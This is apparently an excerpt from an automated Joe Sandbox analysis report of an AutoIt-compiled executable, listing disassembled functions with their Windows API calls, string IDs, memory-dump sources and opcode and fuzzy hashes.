                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: 80662be1f271be92e4db1fec87716a522c55a8b0c8dd3e0ce71a884367d7a7b4
                                                                                        • Instruction ID: 00832a53cb592ba2fd00b7d8d0a6acd8a92f7966f9d589c979d9527b63af4f74
                                                                                        • Opcode Fuzzy Hash: 80662be1f271be92e4db1fec87716a522c55a8b0c8dd3e0ce71a884367d7a7b4
                                                                                        • Instruction Fuzzy Hash: 0E31A171610208AEEB109F38CC81BFB77A9FF59760F408619F9A9D7190CB71AC41E760
                                                                                        Function 00F25157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F251C6
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F25201
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 9617bd0f34f7b8a29d555516631834238a55f9106e5b54444ff63d009f1cc0f8
                                                                                        • Instruction ID: 2eea301c67146a0637cdea8c568ffb751b6fb53a9f48a3effb5dc3b0c438e49f
                                                                                        • Opcode Fuzzy Hash: 9617bd0f34f7b8a29d555516631834238a55f9106e5b54444ff63d009f1cc0f8
                                                                                        • Instruction Fuzzy Hash: 5B31E631E00724EBEB28CF99E845BAEBBF4FF45760F140019E985E61E0D7749944EB10
                                                                                        Function 00F3658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 2391506597-2584243854
                                                                                        • Opcode ID: 5c5ad2e9c092482c2e25682ff89aa3c2bcc445bafa960b8e2d40987abd4b7e68
                                                                                        • Instruction ID: bc59c8a566473895257ed1d9908d66875a234eea2b12eefd291beb84ced94b28
                                                                                        • Opcode Fuzzy Hash: 5c5ad2e9c092482c2e25682ff89aa3c2bcc445bafa960b8e2d40987abd4b7e68
                                                                                        • Instruction Fuzzy Hash: 00218D71A00218BBCF10EFA5CC82EAE73B4AF44354F1044A9F505FB181DB70EA45EBA2
                                                                                        Function 00F493CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F4945C
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F49467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        • Opcode ID: f32228757d26d989c80fde14306d6410546075fe8c527afb494500a477870fdc
                                                                                        • Instruction ID: f7197e8e1be117a28335292782facb3a16f0d22513632b9efc073726929a7668
                                                                                        • Opcode Fuzzy Hash: f32228757d26d989c80fde14306d6410546075fe8c527afb494500a477870fdc
                                                                                        • Instruction Fuzzy Hash: 8111B2B1704208AFEF21DE54DC80EBB3B6EEB893B4F104125FD18972A0D6B59C52A760
                                                                                        Function 00F498FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                          • Part of subcall function 00EFD17C: GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                          • Part of subcall function 00EFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F49968
                                                                                        • GetSysColor.USER32(00000012), ref: 00F49982
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        • Opcode ID: eb2050c2465f40fd4f6da7363d44be2571d7487b3b4a4fd4e792a306437dcdff
                                                                                        • Instruction ID: 13c2ff5650a6d764761ff6ae8ae0d1a4fdb27efd37c0214c1be98165dca456b9
                                                                                        • Opcode Fuzzy Hash: eb2050c2465f40fd4f6da7363d44be2571d7487b3b4a4fd4e792a306437dcdff
                                                                                        • Instruction Fuzzy Hash: 6C116D72A1020AAFDB04DFB8CC45AFA7BA8FB08314F010518FD55D3250D774E810EB50
                                                                                        Function 00F49617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00F49699
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F496A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        • Opcode ID: 6594abf6aa6c64b2516b07692104480500a13f9483375d389d15c9492fcc381e
                                                                                        • Instruction ID: 5979f2f40d217acba859adf868d47bea1ec47cf0ce39907f70a8d3366bbc8caf
                                                                                        • Opcode Fuzzy Hash: 6594abf6aa6c64b2516b07692104480500a13f9483375d389d15c9492fcc381e
                                                                                        • Instruction Fuzzy Hash: A0118C71A04108ABEB205F64DC44EEB3B6AEB053B8F514318FD65971E0C7B5DC50BB60
                                                                                        Function 00F25262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F252D5
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F252F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 0a8e98e14667ac2388d38aac2b5f91c2d987010b7958b264288fda37cc6a6ac5
                                                                                        • Instruction ID: 13751e023c81018d291637f76fd5656740557024dfb3de62781d09958d1c99dc
                                                                                        • Opcode Fuzzy Hash: 0a8e98e14667ac2388d38aac2b5f91c2d987010b7958b264288fda37cc6a6ac5
                                                                                        • Instruction Fuzzy Hash: 3C11B272D01634EBDB20DB98ED44B9D77B9AB06BA0F150025E941E72D0D7B0ED08E7A1
                                                                                        Function 00F34D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F34DF5
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F34E1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        • Opcode ID: 39af969aa27cc8e82ac96c81f457801e18e7695ec34ab75240c81a4905a7f556
                                                                                        • Instruction ID: d4f513b7289d796eb68178ac4b2ef5838cc7b4b4b3d07e59cfaab46c20e34e8a
                                                                                        • Opcode Fuzzy Hash: 39af969aa27cc8e82ac96c81f457801e18e7695ec34ab75240c81a4905a7f556
                                                                                        • Instruction Fuzzy Hash: 8D11A071A01225BBDB258F51C888FFBFBA8FF06775F10822AF51556180D3707980E6E0
                                                                                        Function 00F3A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00F3A84E
                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00F3A88B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: htonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 3832099526-2422070025
                                                                                        • Opcode ID: 2330f8d61f301c04d108888c62a1d7136dddfc1c7e63663a85cf2d9ef1e5af2d
                                                                                        • Instruction ID: 65e6c9853d1fd72c79f0f232cd83d9fcc72ed6a5a435cd4e511fbd6515adaa32
                                                                                        • Opcode Fuzzy Hash: 2330f8d61f301c04d108888c62a1d7136dddfc1c7e63663a85cf2d9ef1e5af2d
                                                                                        • Instruction Fuzzy Hash: B501F575600308ABCB209F69CC86FEDB364EF44734F10852AF566AB2D1D776E806E752
                                                                                        Function 00F1B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F1B7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: d1c7f9cf0bba6e065b1f976b0627636bdea7a53599115fa18ca02e3ad283d01a
                                                                                        • Instruction ID: 8cfba207cad4914f13e1835afc8aefbb2512f149eac4a14bacf604ff9c058d21
                                                                                        • Opcode Fuzzy Hash: d1c7f9cf0bba6e065b1f976b0627636bdea7a53599115fa18ca02e3ad283d01a
                                                                                        • Instruction Fuzzy Hash: 8201F772A41118EBCB04EBA8CC52DFE33BEBF45360B14061DF472672D2EB755949A790
                                                                                        Function 00F1B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F1B6EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: 5be8157a16109354f14f42223f0a826fd3a1109e18e56db7bb8727e859cff116
                                                                                        • Instruction ID: 833f61904ddfdda04d2455bbd6b2f04fc1df8aa877edb65d10a817c4b07c4195
                                                                                        • Opcode Fuzzy Hash: 5be8157a16109354f14f42223f0a826fd3a1109e18e56db7bb8727e859cff116
                                                                                        • Instruction Fuzzy Hash: B201A272A41008ABDB04EBA5C962BFE73B99F15344F24001DF402B3191DB949E19A7B6
                                                                                        Function 00F1B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F1B76C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: f359a138be30a01ee80c45d1f234d711333e6aa6ef7a0360fad6a853968ccb77
                                                                                        • Instruction ID: e4c5c7bd5f98e6b00c1dfe3fc1d91eae26a0a13352569d47859d47397eb57d90
                                                                                        • Opcode Fuzzy Hash: f359a138be30a01ee80c45d1f234d711333e6aa6ef7a0360fad6a853968ccb77
                                                                                        • Instruction Fuzzy Hash: 8F01D672A41108FBDB00EBA4C912FFE73ED9B05344F240019F401B31D2DB649E4AA7B6
                                                                                        Function 00EE4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00EE0000,00000063,00000001,00000010,00000010,00000000), ref: 00EE4048
                                                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,00F267E9,00000063,00000000,76950280,?,?,00EE3EE1,?,?,000000FF), ref: 00F541B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumImageLoadNamesResource
                                                                                        • String ID: >
                                                                                        • API String ID: 1578290342-260571596
                                                                                        • Opcode ID: 8a8ec80ccefe8b020e5e071e2044e6ea086f5db1df3bf2eba76595bfd2c91a49
                                                                                        • Instruction ID: 6ba6ea5877f7ee1107abe1e75e51c0dc32073eb1b6bcf6bceddd176b2a02120a
                                                                                        • Opcode Fuzzy Hash: 8a8ec80ccefe8b020e5e071e2044e6ea086f5db1df3bf2eba76595bfd2c91a49
                                                                                        • Instruction Fuzzy Hash: 83F062B174036C77D2204B16BC46FD23A5DA706BB5F114106F615A61D0D2E09480A6A0
                                                                                        Function 00F27744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: 6d813ab470d3997c17e88ad74bbe6979b59f473c9cd76b1771f47c1745ddf4ac
                                                                                        • Instruction ID: 7393cc8e896881dddb573e95eb7e0995c19b799cf4a2a99d511d9e5501eb26d1
                                                                                        • Opcode Fuzzy Hash: 6d813ab470d3997c17e88ad74bbe6979b59f473c9cd76b1771f47c1745ddf4ac
                                                                                        • Instruction Fuzzy Hash: 49E0D877A0432927DB10EBA5EC09E97FFACFB55760F000016F915D3081D6B0E60197D0
                                                                                        Function 00F1A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F1A63F
                                                                                          • Part of subcall function 00F013F1: _doexit.LIBCMT ref: 00F013FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        • Opcode ID: 7055f79ddcb42ed1bc21a209be0d73adead43f468110693e5edeb8562c95a31a
                                                                                        • Instruction ID: 23ead47380d3fdc339f5bd5b607eb529707f59ab6c249c5a8cb08ab3362117a8
                                                                                        • Opcode Fuzzy Hash: 7055f79ddcb42ed1bc21a209be0d73adead43f468110693e5edeb8562c95a31a
                                                                                        • Instruction Fuzzy Hash: D1D05B323C532C33D31436A96C17FD575889F15B65F044016FB0CA55C24DD6D98071EA
                                                                                        Function 00F5AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00F5ACC0
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F5AEBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 510247158-3257408948
                                                                                        • Opcode ID: 7e158815dac198cd85c99ffd1c2342bf91bbd353c6c19e558e0b590ee9e5cb9f
                                                                                        • Instruction ID: 55fe8fb9379dec657831f7c8c4e3f4458fc5ee194168948441609bef453deba5
                                                                                        • Opcode Fuzzy Hash: 7e158815dac198cd85c99ffd1c2342bf91bbd353c6c19e558e0b590ee9e5cb9f
                                                                                        • Instruction Fuzzy Hash: 84E06571D0010DDFCB11DBA4DD48AECF7B8AB48301F108185E622B2160C7B09A48FF21
                                                                                        Function 00F486CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F486E2
                                                                                        • PostMessageW.USER32(00000000), ref: 00F486E9
                                                                                          • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
